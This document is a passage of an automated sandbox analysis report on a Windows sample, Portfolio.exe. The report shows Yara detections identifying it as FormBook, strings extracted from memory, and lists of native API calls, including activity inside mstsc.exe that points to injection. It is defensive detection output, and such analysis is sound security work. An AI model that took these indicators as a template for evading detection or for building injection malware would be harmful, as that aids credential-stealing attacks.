e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>

Source: Portfolio.exe, 00000000.00000003.228584223.0000000001B0D000.00000004.00000001.sdmp	String found in binary or memory: http://en.wg
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Portfolio.exe, 00000000.00000002.249960275.0000000003421000.00000004.00000001.sdmp, Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Portfolio.exe, 00000000.00000002.255677929.0000000006450000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Portfolio.exe, 00000000.00000003.234330110.000000000645D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8g
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Portfolio.exe, 00000000.00000003.233964245.0000000006459000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersP
Source: Portfolio.exe, 00000000.00000002.255677929.0000000006450000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.come.com
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Portfolio.exe, 00000000.00000003.229070547.000000000646B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com-uK2
Source: Portfolio.exe, 00000000.00000003.229070547.000000000646B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comF
Source: Portfolio.exe, 00000000.00000003.229124720.000000000646B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comc
Source: Portfolio.exe, 00000000.00000003.229044893.000000000646B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comic
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Portfolio.exe, 00000000.00000003.231020561.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: Portfolio.exe, 00000000.00000003.231020561.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/1
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Portfolio.exe, 00000000.00000003.230728863.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnFe
Source: Portfolio.exe, 00000000.00000003.230728863.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnnte
Source: Portfolio.exe, 00000000.00000003.230728863.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnorm
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Zp
Source: Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ana
Source: Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ip
Source: Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/tp&
Source: Portfolio.exe, 00000000.00000003.228912347.000000000646B000.00000004.00000001.sdmp, Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Portfolio.exe, 00000000.00000003.228912347.000000000646B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comd
Source: Portfolio.exe, 00000000.00000003.228912347.000000000646B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comif13
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Portfolio.exe, 00000000.00000003.230122037.0000000006459000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr0l
Source: Portfolio.exe, 00000000.00000003.230122037.0000000006459000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krN.TTF
Source: Portfolio.exe, 00000000.00000003.230122037.0000000006459000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krs.
Source: explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Portfolio.exe, 00000000.00000003.229361711.000000000646B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comc
Source: Portfolio.exe, 00000000.00000003.229361711.000000000646B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comh
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.Portfolio.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Portfolio.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Portfolio.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Portfolio.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Portfolio.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Portfolio.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00419D60 NtCreateFile,	3_2_00419D60
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00419E10 NtReadFile,	3_2_00419E10
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00419E90 NtClose,	3_2_00419E90
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00419F40 NtAllocateVirtualMemory,	3_2_00419F40
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00419E0A NtReadFile,	3_2_00419E0A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00419E8A NtClose,	3_2_00419E8A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00419F3A NtAllocateVirtualMemory,	3_2_00419F3A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C99A0 NtCreateSection,LdrInitializeThunk,	3_2_019C99A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C95D0 NtClose,LdrInitializeThunk,	3_2_019C95D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_019C9910
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9540 NtReadFile,LdrInitializeThunk,	3_2_019C9540
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C98F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_019C98F0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9840 NtDelayExecution,LdrInitializeThunk,	3_2_019C9840
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_019C9860
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9780 NtMapViewOfSection,LdrInitializeThunk,	3_2_019C9780
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C97A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_019C97A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9710 NtQueryInformationToken,LdrInitializeThunk,	3_2_019C9710
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C96E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_019C96E0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_019C9A00
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9A20 NtResumeThread,LdrInitializeThunk,	3_2_019C9A20
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9A50 NtCreateFile,LdrInitializeThunk,	3_2_019C9A50
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_019C9660
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C99D0 NtCreateProcessEx,	3_2_019C99D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C95F0 NtQueryInformationFile,	3_2_019C95F0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019CAD30 NtSetContextThread,	3_2_019CAD30
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9520 NtWaitForSingleObject,	3_2_019C9520
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9950 NtQueueApcThread,	3_2_019C9950
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9560 NtWriteFile,	3_2_019C9560
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C98A0 NtWriteVirtualMemory,	3_2_019C98A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9820 NtEnumerateKey,	3_2_019C9820
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019CB040 NtSuspendThread,	3_2_019CB040
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019CA3B0 NtGetContextThread,	3_2_019CA3B0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9FE0 NtCreateMutant,	3_2_019C9FE0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019CA710 NtOpenProcessToken,	3_2_019CA710
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9B00 NtSetValueKey,	3_2_019C9B00
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9730 NtQueryVirtualMemory,	3_2_019C9730
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9770 NtSetInformationFile,	3_2_019C9770
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019CA770 NtOpenThread,	3_2_019CA770
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9760 NtOpenProcess,	3_2_019C9760
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9A80 NtOpenDirectoryObject,	3_2_019C9A80
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C96D0 NtCreateKey,	3_2_019C96D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9610 NtEnumerateValueKey,	3_2_019C9610
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9A10 NtQuerySection,	3_2_019C9A10
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9650 NtQueryValueKey,	3_2_019C9650
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C9670 NtQueryInformationProcess,	3_2_019C9670
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	14_2_050C9910
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9540 NtReadFile,LdrInitializeThunk,	14_2_050C9540
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C99A0 NtCreateSection,LdrInitializeThunk,	14_2_050C99A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C95D0 NtClose,LdrInitializeThunk,	14_2_050C95D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9840 NtDelayExecution,LdrInitializeThunk,	14_2_050C9840
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9860 NtQuerySystemInformation,LdrInitializeThunk,	14_2_050C9860
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9710 NtQueryInformationToken,LdrInitializeThunk,	14_2_050C9710
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9780 NtMapViewOfSection,LdrInitializeThunk,	14_2_050C9780
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9FE0 NtCreateMutant,LdrInitializeThunk,	14_2_050C9FE0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9650 NtQueryValueKey,LdrInitializeThunk,	14_2_050C9650
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9A50 NtCreateFile,LdrInitializeThunk,	14_2_050C9A50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9660 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_050C9660
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C96D0 NtCreateKey,LdrInitializeThunk,	14_2_050C96D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C96E0 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_050C96E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9520 NtWaitForSingleObject,	14_2_050C9520
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050CAD30 NtSetContextThread,	14_2_050CAD30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9950 NtQueueApcThread,	14_2_050C9950
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9560 NtWriteFile,	14_2_050C9560
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C99D0 NtCreateProcessEx,	14_2_050C99D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C95F0 NtQueryInformationFile,	14_2_050C95F0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9820 NtEnumerateKey,	14_2_050C9820
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050CB040 NtSuspendThread,	14_2_050CB040
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C98A0 NtWriteVirtualMemory,	14_2_050C98A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C98F0 NtReadVirtualMemory,	14_2_050C98F0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9B00 NtSetValueKey,	14_2_050C9B00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050CA710 NtOpenProcessToken,	14_2_050CA710
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9730 NtQueryVirtualMemory,	14_2_050C9730
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9760 NtOpenProcess,	14_2_050C9760
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9770 NtSetInformationFile,	14_2_050C9770
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050CA770 NtOpenThread,	14_2_050CA770
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C97A0 NtUnmapViewOfSection,	14_2_050C97A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050CA3B0 NtGetContextThread,	14_2_050CA3B0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9A00 NtProtectVirtualMemory,	14_2_050C9A00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9610 NtEnumerateValueKey,	14_2_050C9610
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9A10 NtQuerySection,	14_2_050C9A10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9A20 NtResumeThread,	14_2_050C9A20
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9670 NtQueryInformationProcess,	14_2_050C9670
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C9A80 NtOpenDirectoryObject,	14_2_050C9A80
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03049F40 NtAllocateVirtualMemory,	14_2_03049F40
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03049E10 NtReadFile,	14_2_03049E10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03049E90 NtClose,	14_2_03049E90
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03049D60 NtCreateFile,	14_2_03049D60
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03049F3A NtAllocateVirtualMemory,	14_2_03049F3A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03049E0A NtReadFile,	14_2_03049E0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03049E8A NtClose,	14_2_03049E8A

Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_019EC2B0	0_2_019EC2B0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_019E9968	0_2_019E9968
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD38A0	0_2_01AD38A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD0040	0_2_01AD0040
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD0548	0_2_01AD0548
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD6930	0_2_01AD6930
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD0006	0_2_01AD0006
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD0538	0_2_01AD0538
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD34E8	0_2_01AD34E8
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD07E8	0_2_01AD07E8
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_01AD07D8	0_2_01AD07D8
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0041E91E	3_2_0041E91E
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00409E40	3_2_00409E40
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00409E3B	3_2_00409E3B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0041CFE6	3_2_0041CFE6
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2581	3_2_019B2581
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A525DD	3_2_01A525DD
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199D5E0	3_2_0199D5E0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198F900	3_2_0198F900
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A52D07	3_2_01A52D07
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01980D20	3_2_01980D20
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A4120	3_2_019A4120
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A51D55	3_2_01A51D55
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199B090	3_2_0199B090
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A520A8	3_2_01A520A8
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B20A0	3_2_019B20A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A528EC	3_2_01A528EC
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199841F	3_2_0199841F
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41002	3_2_01A41002
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4D466	3_2_01A4D466
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BEBB0	3_2_019BEBB0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A51FF1	3_2_01A51FF1
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4DBD2	3_2_01A4DBD2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A52B28	3_2_01A52B28
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A522AE	3_2_01A522AE
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A52EF7	3_2_01A52EF7
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A6E30	3_2_019A6E30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508F900	14_2_0508F900
